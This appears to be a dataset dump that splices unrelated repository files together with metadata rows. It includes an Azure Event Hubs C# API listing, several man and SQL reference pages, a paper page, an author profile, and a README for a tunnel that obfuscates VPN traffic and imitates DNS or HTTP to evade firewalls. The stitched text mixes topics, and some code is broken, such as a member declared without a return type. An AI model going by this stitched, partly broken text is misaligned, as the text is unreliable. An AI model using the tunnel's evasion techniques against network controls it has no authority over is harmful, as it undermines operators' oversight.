public string EventHubName { get; }
public string ConsumerGroup { get; }
public string Identifier { get; protected set; }
public bool IsRunning { get; protected set; }
protected EventHubsRetryPolicy RetryPolicy { get; }
protected EventProcessor(
int eventBatchMaximumCount,
string consumerGroup,
string connectionString,
EventProcessorOptions options = default);
protected EventProcessor(
int eventBatchMaximumCount,
string consumerGroup,
string connectionString,
string eventHubName,
EventProcessorOptions options = default);
protected EventProcessor(
int eventBatchMaximumCount,
string consumerGroup,
string fullyQualifiedNamespace,
string eventHubName,
TokenCredential credential,
EventProcessorOptions options = default);
// Optional extension points (core)
public virtual Task StartProcessingAsync(CancellationToken cancellationToken = default);
public virtual void StartProcessing(CancellationToken cancellationToken = default);
public virtual Task StopProcessingAsync(CancellationToken cancellationToken = default);
public virtual void StopProcessing(CancellationToken cancellationToken = default);
protected virtual EventHubConnection CreateConnection();
protected virtual Task OnInitializingPartitionAsync(TPartition partition, CancellationToken cancellationToken);
protected virtual Task OnPartitionProcessingStoppedAsync(TPartition partition, ProcessingStoppedReason reason, CancellationToken cancellationToken);
// Required extension points (core)
protected abstract Task OnProcessingEventBatchAsync(IEnumerable<EventData> events, TPartition partition, CancellationToken cancellationToken);
protected abstract Task OnProcessingErrorAsync(Exception exception, TPartition partition, string operationDescription, CancellationToken cancellationToken);
// Required extension points (storage operations)
protected abstract Task<IEnumerable<EventProcessorCheckpoint>> ListCheckpointsAsync(CancellationToken cancellationToken);
protected abstract Task<IEnumerable<EventProcessorPartitionOwnership>> ListOwnershipAsync(CancellationToken cancellationToken);
protected abstract Task<IEnumerable<EventProcessorPartitionOwnership>> ClaimOwnershipAsync(IEnumerable<EventProcessorPartitionOwnership> desiredOwnership, CancellationToken cancellationToken);
// Infrastructure
protected internal virtual CreateConnection();
protected virtual LastEnqueuedEventProperties ReadLastEnqueuedEventProperties(string partitionId);
}
public class EventProcessorOptions
{
public EventHubConnectionOptions ConnectionOptions { get; set; }
public EventHubsRetryOptions RetryOptions { get; set; }
public string Identifier { get; set; }
public int PrefetchCount { get; set; }
public bool TrackLastEnqueuedEventProperties { get; set; }
public TimeSpan? MaximumWaitTime { get; set; } = TimeSpan.FromSeconds(60);
public EventPosition DefaultStartingPosition { get; set; } = EventPosition.Earliest;
public TimeSpan LoadBalancingUpdateInterval { get; set; } = TimeSpan.FromSeconds(10);
public TimeSpan PartitionOwnershipExpirationInterval { get; set; } = TimeSpan.FromSeconds(30);
}
public class EventProcessorPartition
{
public string PartitionId { get; internal set; }
}
public class EventProcessorCheckpoint
{
public string FullyQualifiedNamespace { get; set; }
public string EventHubName { get; set; }
public string ConsumerGroup { get; set; }
public string PartitionId { get; set; }
public EventPosition StartingPosition { get; set; }
}
public class EventProcessorPartitionOwnership
{
public string FullyQualifiedNamespace { get; set; }
public string EventHubName { get; set; }
public string ConsumerGroup { get; set; }
public string OwnerIdentifier { get; set; }
public string PartitionId { get; set; }
public string Version { get; set; }
public DateTimeOffset LastModifiedTime { get; set; }
}
```
## Namespace organization
### Package: Azure.Messaging.EventHubs
#### `Azure.Messaging.EventHubs.Primitives`
```csharp
public class EventProcessor<TPartition> {}
public class EventProcessorOptions {}
public class EventProcessorCheckpoint {}
public class EventProcessorPartition {}
public class EventProcessorPartitionOwnership {}
public class PartitionReceiver {}
public class PartitionReceiverOptions {}
```
#### `Azure.Messaging.EventHubs.Processor`
```csharp
public struct ProcessEventArgs {}
public class PartitionInitializingEventArgs {}
public class PartitionClosingEventArgs {}
public struct ProcessErrorEventArgs {}
public enum ProcessingStoppedReason {}
```
#### `Azure.Messaging.EventHubs`
```csharp
public class EventHubConnection {}
public class EventHubConnectionOptions {}
public class EventData {}
public class EventHubsException {}
public class EventHubProperties {}
public abstract class EventHubsRetryPolicy {}
public enum EventHubsRetryMode {}
public class EventHubsRetryOptions {}
public enum EventHubsTransportType {}
public class PartitionProperties {}
```
#### `Azure.Messaging.EventHubs.Consumer`
```csharp
public class EventHubConsumerClient {}
public class EventHubConsumerClientOptions {}
public struct EventPosition {}
public struct LastEnqueuedEventProperties {}
public class PartitionContext {}
public struct PartitionEvent {}
public class ReadEventOptions {}
```
#### `Azure.Messaging.EventHubs.Producer`
```csharp
public class EventHubProducerClient {}
public class EventHubProducerClientOptions {}
public class CreateBatchOptions {}
public sealed class EventDataBatch {}
```
### Package: Azure.Messaging.EventHubs.Processor
#### `Azure.Messaging.EventHubs.Processor`
```csharp
public class EventProcessorClient {}
public class EventProcessorClientOptions {}
``` | 47.869318 | 614 | 0.758338 | eng_Latn | 0.827608 |
fa68b2c72a8c71987b8c5c0f85239be4ef9ffd4e | 367 | md | Markdown | docs/survey_end.md | demondas/wiki_english | fb596b48a006267c9d8d828d95630a0973ae72b4 | [
"MIT"
] | null | null | null | docs/survey_end.md | demondas/wiki_english | fb596b48a006267c9d8d828d95630a0973ae72b4 | [
"MIT"
] | null | null | null | docs/survey_end.md | demondas/wiki_english | fb596b48a006267c9d8d828d95630a0973ae72b4 | [
"MIT"
] | null | null | null | ---
title: survey_end
category: About
---

## Tech Support
Please do not hesitate to contact [techsupport@seeed.cc](techsupport@seeed.cc) if you have any technical issue. Or submit the issue into our [forum](http://forum.seeedstudio.com/). | 40.777778 | 181 | 0.773842 | eng_Latn | 0.664475 |
fa698e2426a8830c05d32fc67b9ee07b6cad91b5 | 16 | md | Markdown | README.md | iandouglas96/swarm-thesis | dbafa2343a75c4de26b0ae19d08a033b34570287 | [
"MIT"
] | null | null | null | README.md | iandouglas96/swarm-thesis | dbafa2343a75c4de26b0ae19d08a033b34570287 | [
"MIT"
] | null | null | null | README.md | iandouglas96/swarm-thesis | dbafa2343a75c4de26b0ae19d08a033b34570287 | [
"MIT"
] | null | null | null | ## Swarm thesis
| 8 | 15 | 0.6875 | eng_Latn | 0.997941 |
fa6a1d4a46fa36a919bbe03190ad4f3af0966336 | 1,460 | md | Markdown | cli/man/splinter-authid.1.md | CLEckhardt/splinter | 707f44179f2e19f5cc273c45b0dac6040acb6e8b | [
"Apache-2.0"
] | null | null | null | cli/man/splinter-authid.1.md | CLEckhardt/splinter | 707f44179f2e19f5cc273c45b0dac6040acb6e8b | [
"Apache-2.0"
] | null | null | null | cli/man/splinter-authid.1.md | CLEckhardt/splinter | 707f44179f2e19f5cc273c45b0dac6040acb6e8b | [
"Apache-2.0"
] | null | null | null | % SPLINTER-AUTHID(1) Cargill, Incorporated | Splinter Commands
<!--
Copyright 2018-2022 Cargill Incorporated
Licensed under Creative Commons Attribution 4.0 International License
https://creativecommons.org/licenses/by/4.0/
-->
NAME
====
**splinter-authid** — Provides management functions for the Role-Based
Authorization authorized identities on a Splinter node.
SYNOPSIS
========
**splinter** **authid** \[**FLAGS**\] \[**SUBCOMMAND**\]
DESCRIPTION
===========
This command provides subcommands for viewing and modifying role-based access
assignments for a Splinter daemon.
FLAGS
=====
`-h`, `--help`
: Prints help information
`-q`, `--quiet`
: Decreases verbosity (the opposite of -v). When specified, only errors or
warnings will be output.
`-V`, `--version`
: Prints version information
`-v`
: Increases verbosity (the opposite of -q). Specify multiple times for more
output.
SUBCOMMANDS
===========
`create`
: Creates an authorized identity on a Splinter node
`delete`
: Deletes an authorized identity on a Splinter node
`list`
: Lists the authorized identities on a Splinter node
`show`
: Shows an authorized identity on a Splinter node
`update`
: Updates an authorized identity on a Splinter node
SEE ALSO
========
| `splinter-authid-create(1)`
| `splinter-authid-delete(1)`
| `splinter-authid-list(1)`
| `splinter-authid-show(1)`
| `splinter-authid-update(1)`
|
| Splinter documentation: https://www.splinter.dev/docs/0.7/
| 21.470588 | 77 | 0.716438 | eng_Latn | 0.703766 |
fa6a6ed529a4002fd1c11e51047c44548b54f949 | 1,813 | md | Markdown | docs/connect/jdbc/reference/updatearray-method-int-java-sql-array.md | gmilani/sql-docs.pt-br | 02f07ca69eae8435cefd74616a8b00f09c4d4f99 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/connect/jdbc/reference/updatearray-method-int-java-sql-array.md | gmilani/sql-docs.pt-br | 02f07ca69eae8435cefd74616a8b00f09c4d4f99 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/connect/jdbc/reference/updatearray-method-int-java-sql-array.md | gmilani/sql-docs.pt-br | 02f07ca69eae8435cefd74616a8b00f09c4d4f99 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Método updateArray (int, Java. Sql. array) | Microsoft Docs
ms.custom: ''
ms.date: 01/19/2017
ms.prod: sql
ms.prod_service: connectivity
ms.reviewer: ''
ms.technology: connectivity
ms.topic: conceptual
apiname:
- SQLServerResultSet.updateArray (int, java.sql.Array)
apilocation:
- sqljdbc.jar
apitype: Assembly
ms.assetid: 464f7e3f-3e8a-4b2d-aebd-1c040583d52c
author: MightyPen
ms.author: genemi
ms.openlocfilehash: cf9dc7a5e2bf04e33f9fb1ea96a0c62f41378f3b
ms.sourcegitcommit: b2464064c0566590e486a3aafae6d67ce2645cef
ms.translationtype: MTE75
ms.contentlocale: pt-BR
ms.lasthandoff: 07/15/2019
ms.locfileid: "67985588"
---
# <a name="updatearray-method-int-javasqlarray"></a>Método updateArray (int, java.sql.Array)
[!INCLUDE[Driver_JDBC_Download](../../../includes/driver_jdbc_download.md)]
Atualiza a coluna designada com um objeto Array, considerando o índice da coluna.
## <a name="syntax"></a>Sintaxe
```
public void updateArray(int columnIndex,
java.sql.Array x)
```
#### <a name="parameters"></a>Parâmetros
*columnIndex*
Um **int** que indica o índice de coluna.
*x*
Um objeto Array.
## <a name="exceptions"></a>Exceções
[SQLServerException](../../../connect/jdbc/reference/sqlserverexception-class.md)
## <a name="remarks"></a>Remarks
Esse método updateArray é especificado pelo método updateArray na interface java.sql.ResultSet.
## <a name="see-also"></a>Consulte Também
[Método updateArray (SQLServerResultSet)](../../../connect/jdbc/reference/updatearray-method-sqlserverresultset.md)
[Membros de SQLServerResultSet](../../../connect/jdbc/reference/sqlserverresultset-members.md)
[Classe SQLServerResultSet](../../../connect/jdbc/reference/sqlserverresultset-class.md)
| 30.728814 | 127 | 0.720353 | por_Latn | 0.185523 |
fa6a8ef758e489ad4e1bb33f12e2bf74f29a3198 | 4,752 | md | Markdown | docs/t-sql/functions/options-transact-sql.md | jaredmoo/sql-docs | fae18f2837c5135d3482a26f999173ecf4f9f58e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/t-sql/functions/options-transact-sql.md | jaredmoo/sql-docs | fae18f2837c5135d3482a26f999173ecf4f9f58e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/t-sql/functions/options-transact-sql.md | jaredmoo/sql-docs | fae18f2837c5135d3482a26f999173ecf4f9f58e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "@@OPTIONS (Transact-SQL) | Microsoft Docs"
ms.custom: ""
ms.date: "09/18/2017"
ms.prod: "sql"
ms.prod_service: "database-engine, sql-database"
ms.service: ""
ms.component: "t-sql|functions"
ms.reviewer: ""
ms.suite: "sql"
ms.technology:
- "database-engine"
ms.tgt_pltfrm: ""
ms.topic: "language-reference"
f1_keywords:
- "@@OPTIONS"
- "@@OPTIONS_TSQL"
dev_langs:
- "TSQL"
helpviewer_keywords:
- "SET statement, current SET options"
- "@@OPTIONS function"
- "current SET options"
ms.assetid: 3d5c7f6e-157b-4231-bbb4-4645a11078b3
caps.latest.revision: 34
author: "edmacauley"
ms.author: "edmaca"
manager: "craigg"
---
# @@OPTIONS (Transact-SQL)
[!INCLUDE[tsql-appliesto-ss2008-asdb-xxxx-xxx-md](../../includes/tsql-appliesto-ss2008-asdb-xxxx-xxx-md.md)]
Returns information about the current SET options.
 [Transact-SQL Syntax Conventions](../../t-sql/language-elements/transact-sql-syntax-conventions-transact-sql.md)
## Syntax
```
@@OPTIONS
```
## Return Types
**integer**
## Remarks
The options can come from use of the **SET** command or from the **sp_configure user options** value. Session values configured with the **SET** command override the **sp_configure** options. Many tools (such as [!INCLUDE[ssManStudio](../../includes/ssmanstudio-md.md)] automatically configure set options. Each user has an @@OPTIONS function that represents the configuration.
You can change the language and query-processing options for a specific user session by using the SET statement. **@@OPTIONS** can only detect the options which are set to ON or OFF.
The **@@OPTIONS** function returns a bitmap of the options, converted to a base 10 (decimal) integer. The bit settings are stored in the locations described in a table in the topic [Configure the user options Server Configuration Option](../../database-engine/configure-windows/configure-the-user-options-server-configuration-option.md).
To decode the **@@OPTIONS** value, convert the integer returned by **@@OPTIONS** to binary, and then look up the values on the table at [Configure the user options Server Configuration Option](../../database-engine/configure-windows/configure-the-user-options-server-configuration-option.md). For example, if `SELECT @@OPTIONS;` returns the value `5496`, use the Windows programmer calculator (**calc.exe**) to convert decimal `5496` to binary. The result is `1010101111000`. The right most characters (binary 1, 2, and 4) are 0, indicating that the first three items in the table are off. Consulting the table, you see that those are **DISABLE_DEF_CNST_CHK** and **IMPLICIT_TRANSACTIONS**, and **CURSOR_CLOSE_ON_COMMIT**. The next item (**ANSI_WARNINGS** in the `1000` position) is on. Continue working left though the bit map, and down in the list of options. When the left-most options are 0, they are truncated by the type conversion. The bit map `1010101111000` is actually `001010101111000` to represent all 15 options.
## Examples
### A. Demonstration of how changes affect behavior
The following example demonstrates the difference in concatenation behavior with two different setting of the **CONCAT_NULL_YIELDS_NULL** option.
```
SELECT @@OPTIONS AS OriginalOptionsValue;
SET CONCAT_NULL_YIELDS_NULL OFF;
SELECT 'abc' + NULL AS ResultWhen_OFF, @@OPTIONS AS OptionsValueWhen_OFF;
SET CONCAT_NULL_YIELDS_NULL ON;
SELECT 'abc' + NULL AS ResultWhen_ON, @@OPTIONS AS OptionsValueWhen_ON;
```
### B. Testing a client NOCOUNT setting
The following example sets `NOCOUNT``ON` and then tests the value of `@@OPTIONS`. The `NOCOUNT``ON` option prevents the message about the number of rows affected from being sent back to the requesting client for every statement in a session. The value of `@@OPTIONS` is set to `512` (0x0200). This represents the NOCOUNT option. This example tests whether the NOCOUNT option is enabled on the client. For example, it can help track performance differences on a client.
```
SET NOCOUNT ON
IF @@OPTIONS & 512 > 0
RAISERROR ('Current user has SET NOCOUNT turned on.', 1, 1)
```
## See Also
[Configuration Functions (Transact-SQL)](../../t-sql/functions/configuration-functions-transact-sql.md)
[sp_configure (Transact-SQL)](../../relational-databases/system-stored-procedures/sp-configure-transact-sql.md)
[Configure the user options Server Configuration Option](../../database-engine/configure-windows/configure-the-user-options-server-configuration-option.md)
| 56.571429 | 1,029 | 0.724327 | eng_Latn | 0.891327 |
fa6a957d5674a35ee65af5e100ddefcb5c54da13 | 4,022 | md | Markdown | content/publication/RefineLoc/index.md | PardoAlejo/personal-web | 47016680c8aaf81e65d3db0c1598994e57315964 | [
"MIT"
] | null | null | null | content/publication/RefineLoc/index.md | PardoAlejo/personal-web | 47016680c8aaf81e65d3db0c1598994e57315964 | [
"MIT"
] | null | null | null | content/publication/RefineLoc/index.md | PardoAlejo/personal-web | 47016680c8aaf81e65d3db0c1598994e57315964 | [
"MIT"
] | null | null | null | ---
title: "RefineLoc: Iterative Refinement for Weakly-Supervised Action Localization"
# Authors
# If you created a profile for a user (e.g. the default `admin` user), write the username (folder name) here
# and it will be replaced with their full name and linked to their profile.
authors:
- admin
- Humam Alwassel
- Fabian Caba Heilbron
- Juan León Alcázar
- Ali Thabet
- Bernard Ghanem
# Author notes (optional)
author_notes:
- "Equal contribution"
- "Equal contribution"
date: "2021-01-05T00:00:00Z"
doi: ""
# Schedule page publish date (NOT publication's date).
publishDate: "2021-01-05T00:00:00Z"
# Publication type.
# Legend: 0 = Uncategorized; 1 = Conference paper; 2 = Journal article;
# 3 = Preprint / Working Paper; 4 = Report; 5 = Book; 6 = Book section;
# 7 = Thesis; 8 = Patent
publication_types: ["1"]
# Publication name and optional abbreviated publication name.
publication: At *Winter Conference on Applications of Computer Vision 2021*
publication_short: At *WACV 2021*
abstract: Video action detectors are usually trained using datasets with fully-supervised temporal annotations. Building such datasets is an expensive task. To alleviate this problem, recent methods have tried to leverage weak labeling, where videos are untrimmed and only a video-level label is available. In this paper, we propose RefineLoc, a novel weakly-supervised temporal action localization method. RefineLoc uses an iterative refinement approach by estimating and training on snippet-level pseudo ground truth at every iteration. We show the benefit of this iterative approach and present an extensive analysis of five different pseudo ground truth generators. We show the effectiveness of our model on two standard action datasets, ActivityNet v1.2 and THUMOS14. RefineLoc shows competitive results with the state-of-the-art in weakly-supervised temporal localization. Additionally, our iterative refinement process significantly improves the performance of two state-of-the-art methods, setting a new state-of-the-art on THUMOS14.
# Summary. An optional shortened abstract.
summary: RefineLoc is a weakly-supervised temporal action localization method. RefineLoc uses an iterative refinement approach by estimating and training on snippet-level pseudo ground truth at every iteration. Our method shows competitive results with the state-of-the-art in weakly-supervised temporal localization. Additionally, our iterative refinement process significantly improves the performance of two state-of-the-art methods, setting a new state-of-the-art on THUMOS14.
tags: []
# Display this page in the Featured widget?
featured: true
# Custom links (uncomment lines below)
# - name: Custom Link
# url: http://example.org
links:
- name: Publication
url: https://openaccess.thecvf.com/content/CVPR2021W/LXCV/html/Pardo_BAOD_Budget-Aware_Object_Detection_CVPRW_2021_paper.html
- name: Preprint
url: https://arxiv.org/abs/1904.00227
- name: Supplementary
url: https://openaccess.thecvf.com/content/WACV2021/supplemental/Pardo_RefineLoc_Iterative_Refinement_WACV_2021_supplemental.pdf
url_pdf: https://openaccess.thecvf.com/content/WACV2021/papers/Pardo_RefineLoc_Iterative_Refinement_for_Weakly-Supervised_Action_Localization_WACV_2021_paper.pdf
url_code: https://github.com/HumamAlwassel/RefineLoc
# Featured image
# To use, add an image named `featured.jpg/png` to your page's folder.
image:
caption: ''
focal_point: ""
preview_only: false
# Associated Projects (optional).
# Associate this publication with one or more of your projects.
# Simply enter your project's folder or file name without extension.
# E.g. `internal-project` references `content/project/internal-project/index.md`.
# Otherwise, set `projects: []`.
projects: []
# Slides (optional).
# Associate this publication with Markdown slides.
# Simply enter your slide deck's filename without extension.
# E.g. `slides: "example"` references `content/slides/example/index.md`.
# Otherwise, set `slides: ""`.
slides: ""
---
| 49.654321 | 1,041 | 0.785679 | eng_Latn | 0.93394 |
fa6b087bb8029521e2b4d0e4372444f5ebe36348 | 2,089 | md | Markdown | content/authors/adriano/_index.md | lotusnprod/public-webpage | 4ce1c8678c2734d331da146da0c102fc49799245 | [
"MIT"
] | 1 | 2021-12-10T12:17:41.000Z | 2021-12-10T12:17:41.000Z | content/authors/adriano/_index.md | lotusnprod/public-webpage | 4ce1c8678c2734d331da146da0c102fc49799245 | [
"MIT"
] | 1 | 2021-05-20T10:45:59.000Z | 2021-05-20T10:45:59.000Z | content/authors/adriano/_index.md | lotusnprod/lotus-news | 08b0f854388048dcc2153109de7162e5b9d9ebfd | [
"MIT"
] | 2 | 2021-05-20T10:19:29.000Z | 2021-05-29T02:34:36.000Z | ---
# Display name
title: Adriano Rutz
# Username (this should match the folder name)
authors:
- adriano
# Is this the primary user of the site?
superuser: false
# Role/position
role: Researcher
# Organizations/Affiliations
organizations:
- name: University of Geneva
url: "https://ispso.unige.ch/ispso/"
# Short bio (displayed in user profile at end of posts)
bio: Bitter is better.
interests:
- Phytochemistry
- Chemotaxonomy
- Bitterness
education:
courses:
- course: MSc in Pharmaceutical Sciences
institution: University of Geneva
year: 2016
- course: BSc in Pharmaceutical Sciences
institution: University of Geneva
year: 2014
# Social/Academic Networking
# For available icons, see: https://sourcethemes.com/academic/docs/page-builder/#icons
# For an email link, use "fas" icon pack, "envelope" icon, and a link in the
# form "mailto:your-email@example.com" or "#contact" for contact widget.
social:
- icon: orcid
icon_pack: ai
link: 'https://orcid.org/0000-0003-0443-9902'
- icon: envelope
icon_pack: fas
link: 'mailto:adriano.rutz@unige.ch'
- icon: linkedin
icon_pack: fab
link: https://www.linkedin.com/in/adrianorutz/
- icon: twitter
icon_pack: fab
link: https://twitter.com/Adafede
- icon: google-scholar
icon_pack: ai
link: https://scholar.google.com/citations?user=8889AMkAAAAJ
- icon: github
icon_pack: fab
link: https://github.com/Adafede
- icon: researchgate
icon_pack: ai
link: https://www.researchgate.net/profile/Adriano-Rutz-2
- icon: gitlab
icon_pack: fab
link: https://gitlab.com/Adafede
# Link to a PDF of your resume/CV from the About widget.
# To enable, copy your resume/CV to `static/files/cv.pdf` and uncomment the lines below.
# - icon: cv
# icon_pack: ai
# link: files/cv.pdf
# Enter email to display Gravatar (if Gravatar enabled in Config)
email: "adriano.rutz@unige.ch"
# Organizational groups that you belong to (for People widget)
# Set this to `[]` or comment out if you are not using People widget.
user_groups:
- Researchers
---
- Adriano thinks that bitter is better.
| 24.869048 | 88 | 0.729057 | eng_Latn | 0.563593 |
fa6b0a394087726a0dbd1532b05979ef10d971f6 | 647 | md | Markdown | pages/applications-programs-new/quiet/add-a-line.md | theo-armour/2022 | ae1609a9303834bbbb6d81fe8c6224cc9fa10860 | [
"MIT"
] | 1 | 2021-01-03T06:04:04.000Z | 2021-01-03T06:04:04.000Z | pages/applications-programs-new/quiet/add-a-line.md | theo-armour/2022 | ae1609a9303834bbbb6d81fe8c6224cc9fa10860 | [
"MIT"
] | null | null | null | pages/applications-programs-new/quiet/add-a-line.md | theo-armour/2022 | ae1609a9303834bbbb6d81fe8c6224cc9fa10860 | [
"MIT"
] | 1 | 2022-01-20T20:19:05.000Z | 2022-01-20T20:19:05.000Z | ## Add-a-line
## Spec
* Sharable lists of curated links
## 2019-10-11
* Can now use their APIs to write files to GitHub or GitLab - very easily
* Much easier code than I believed possible
* Looks like I had been much distracted by the code used by Google Sheets to write to GitHub - using OAuth maybe
* This new ability is yet another game changer
* Can I use something like this with large file systems?
Saturday
* Start uploading new bookmarks to GitHub
Wishlist
* Have first call single/no click dumping ground file
* Have anonymous commits - so does not clog my personal history
* Use this new ability to create a global clipboard
| 23.962963 | 113 | 0.758887 | eng_Latn | 0.999249 |
fa6b4f3624360b999e8610ee7278f3475c601327 | 46,006 | md | Markdown | README.md | RoliSoft/Obfuscation-Tunnel | cbd31a1c80a7bd5b51057e1a976628727fc8987e | [
"BSD-2-Clause"
] | 11 | 2020-09-15T11:59:41.000Z | 2022-02-11T16:49:08.000Z | README.md | RoliSoft/Obfuscation-Tunnel | cbd31a1c80a7bd5b51057e1a976628727fc8987e | [
"BSD-2-Clause"
] | 2 | 2021-11-13T12:38:01.000Z | 2021-12-06T01:38:07.000Z | README.md | RoliSoft/Obfuscation-Tunnel | cbd31a1c80a7bd5b51057e1a976628727fc8987e | [
"BSD-2-Clause"
] | 2 | 2021-08-12T07:43:16.000Z | 2021-08-23T00:12:20.000Z | # Obfuscation Tunnel
The purpose of this project is two-fold:
* Implement a high-performance and low-overhead UDP-to-UDP tunnel, which has support for encrypting/obfuscating the encapsulated traffic in order to avoid fingerprinting. (Initially developed specifically for masking Wireguard headers.)
* Implement a tunnel which can change the transport protocol from UDP to TCP or ICMP(/v6) in order to evade firewalls which block non-fingerprintable/whitelisted UDP packets, or just UDP traffic outright.
## Usage
```
usage: ./tunnel -l proto:addr:port -r proto:addr:port [args]
arguments:
-l endpoint Local listening protocol, address and port.
Example: tcp:127.0.0.1:80 / icmp6:[::1]
Supported protocols: udp, dtls, tcp, tls, icmp, imcp6.
-r endpoint Remote host to tunnel packets to.
-o [mode] Enable packet obfuscation. Possible values:
header - Simple generic header obfuscation (Default)
xor - XOR packet obfuscation with rolling key
-k key Specifies a key for the obfuscator module.
-m mode Enable protocol imitator. Possible values:
dns_client - Send data as A queries to remote
dns_server - Reply to A queries on local
http_ws_client - Masquarade as HTTP WebSocket stream
http_ws_server - Accept data in HTTP WebSocket streams
socks5:<addr>:<port> - Connect through a SOCKSv5 proxy
-s Disable multithreading, multiplex sockets instead.
-v Detailed logging at the expense of decreased throughput.
-h, --help Displays this message.
TCP-specific arguments:
-e Type of encoding to use for the length header:
v - 7-bit encoded variable-length header (Default)
s - 2-byte unsigned short
n - None (Not recommended)
ICMP/ICMPv6-specific arguments:
-p [if] Use PCAP for inbound, highly recommended.
Optional value, defaults to default gateway otherwise.
-x Expect identifier and sequence randomization.
Not recommended, see documentation for pros and cons.
DNS-specific arguments:
-f Base32-encode data and fragment labels on 60-byte boundaries.
-d domain Optional domain name to act as the authoritative resolver for.
(D)TLS-specific arguments:
--tls-no-verify Ignore certificate validation errors of remote server.
--tls-ca-bundle Path to CA bundle, if not found automatically by OpenSSL.
--tls-cert Path to SSL certificate file in PEM format.
Optional, otherwise it will be auto-generated and self-signed.
--tls-key Path to SSL private key file in PEM format.
```
Example for UDP-to-UDP tunnel:
```
server$ ./tunnel -l udp:0.0.0.0:80 -r udp:engage.cloudflareclient.com:2408
client$ ./tunnel -r udp:server:80 -l udp:127.0.0.1:2408
```
For this example, any packet sent to 127.0.0.1:2408 will be forwarded to server:80, which will further forward it to engage.cloudflareclient.com:2408. Replies will be forwarded backwards through the chain to the last client which sent a valid UDP packet. In essence, the only modification you will need to do to your Wireguard config to go through the tunnel is to replace:
```
[Peer]
Endpoint = engage.cloudflareclient.com:2408
```
With the following:
```
[Peer]
Endpoint = 127.0.0.1:2408
```
Note that while the documentation for this application largely talks in terms of Wireguard examples, the application itself is completely protocol-agnostic, and has nothing to do with Wireguard directly.
## Building
To compile and run the application, you must first install the dependencies, which can be done with:
- Debian/Ubuntu/Kali:
```
apt install build-essential libpcap-dev
```
- RHEL/CentOS/Fedora:
```
yum install gcc make libpcap-devel
```
- macOS: (with [Homebrew](http://brew.sh/))
```
xcode-select --install && brew install libpcap
```
After the dependencies have been satisfied, you can clone the repository and make it:
```
git clone https://github.com/RoliSoft/Obfuscation-Tunnel.git
cd Obfuscation-Tunnel
make
```
If you wish to build without libpcap:
* Skip the installation of the `libpcap` dependency.
* Open the `Makefile` file in your editor,
* Find the `CXXFLAGS` line (should be the first),
* Replace the flags `-DHAVE_PCAP=1 -lpcap` with `-DHAVE_PCAP=0`
## Tunneling VPN traffic
If you are preparing to tunnel VPN traffic, it is very important to make sure that the application can communicate with the default gateway, and once the VPN connects, it will not be redirected to the VPN. If your VPN will try to redirect all traffic (0.0.0.0/0) or the redirected traffic overlaps with the location of the gateway server, you will notice that the connection drops after the initial handshake, once the VPN client sets up the routes and unknowingly hijacks the tunnel's communication.
In order to do this, you can set a static route to the gateway server to be always via the default network interface on your client. However, as a side-effect, any other traffic to the IP address on which your gateway tunnel resides will not be tunneled through the VPN, so make sure you account for this, if you use it for other services.
If you are using ICMPv6, make sure to adapt the commands for IPv6 and set the static route to the IPv6 address of your gateway server.
### Linux
First check the default gateway before the VPN is connected:
```
$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.0.1 0.0.0.0 UG 0 0 0 eth0
```
Knowing the network interface of the default gateway (`eth0` in this example), set a static route to your gateway tunnel server (`123.45.67.89` in this example):
```
sudo ip route add 123.45.67.89/32 dev eth0
```
This will make sure your tunnel traffic will not be hijacked once the VPN is connected.
### macOS
First check the default gateway before the VPN is connected:
```
$ netstat -nr
Routing tables
Internet:
Destination Gateway Flags Netif Expire
default 172.20.10.1 UGSc en4
```
Knowing the IP address of the default gateway (`172.20.10.1` in this example), set a static route to your gateway tunnel server (`123.45.67.89` in this example):
```
sudo route -n add 123.45.67.89/32 172.20.10.1
```
This will make sure your tunnel traffic will not be hijacked once the VPN is connected.
## Obfuscation
Since the modular rewrite of the application, multiple obfuscation methods can be selected. Obfuscation can be turned on by specifying the `-o` flag, this will result in the selection of the "simple generic header obfuscation" module with its built-in key.
Specifying a value for the `-o` flag allows selecting a different module, and the `-k` flag can be used to overwrite the built-in key for the selected module, which is highly recommended, but made optional for ease of use. (Note that the module is called "obfuscator" and not "military-grade encryptor", since its purpose is to try and mask the underlying traffic from automatic fingerprinting, not to encrypt sensitive data.)
### Simple generic header obfuscation
This is the default module, but also selectable with `-o header` explicitly. As it was specifically designed to disguise Wireguard headers, the algorithm used proceeds as follows:
* XORs the first 16 bytes of the UDP packet with a built-in key _or_ a one-byte key provided through `-k`.
* As the first 16 bytes of a Wireguard header contain 3 reserved always-zero bytes, and two more 32-bit counters (sender, receiver index) whose most significant bytes are mostly zero (especially at the beginning of the connection), in order to avoid fingerprinting by looking at the known gaps being XOR'd to the same value from the key, if the packet is long enough (>32 bytes), the next 16 bytes will be XOR'd into the first 16 bytes. In Wireguard, the next 16 bytes are already encrypted data, which means the packet's header will be not have static bytes where zero would be otherwise.
As Wireguard already does a great job of encrypting the traffic, the whole packet is not XOR'd, only the header, and only for masking purposes.
### XOR obfuscation
This module is selectable with `-o xor` and simply XORs the whole data stream with the built-in key or the one specified with `-k`. The size of the key can be any number of bytes up to 1,500. If the packet is larger than the key, the key will be repeated.
If you would like to identify the packets as something else in the firewall, you should play around with setting known values that look like a different protocol in the fields of the UDP packet, where Wireguard has reserved bytes, or bytes that you can map back from WG to the protocol you're trying to imitate, for example the packet type byte.
## Protocol imitation
While the application was originally developed to work in the network (e.g. ICMP) and transport (e.g. TCP, UDP) layers, support has been for imitating application (e.g. DNS, HTTP) layer protocols that run under their supported transport layers.
Protocol imitators (called "mockers" in the application) work on top of the transport layers, and may initiate a handshake that looks like the protocol they are trying to imitate, and then encapsulate the datastream in a way that it would look like it is legit traffic from the protocol they are trying to imitate.
When used together with an obfuscator, the obfuscator will process the data before the encapsulation by the mocker, otherwise, the protocol being imitated would be obfuscated as well.
### DNS imitator
The DNS imitator can be turned on using the `-m dns_client` flag on the local server, and with `-m dns_server` on the gateway server. It can work on top of the UDP and TCP transports, as DNS supports both. (Note that it can be run with ICMP endpoints as well, but a warning will be produced by the application, as it does not make much sense to encapsulate ICMP Echo Requests into DNS queries.)
The module will send DNS `A` queries to the remote server, which will reply with DNS `A` responses, where the "hostname" field will contain your data. The module does not try to emulate a complete DNS server, only produce DNS-like traffic, as such it will not be able to properly respond to DNS requests that are not from this application.
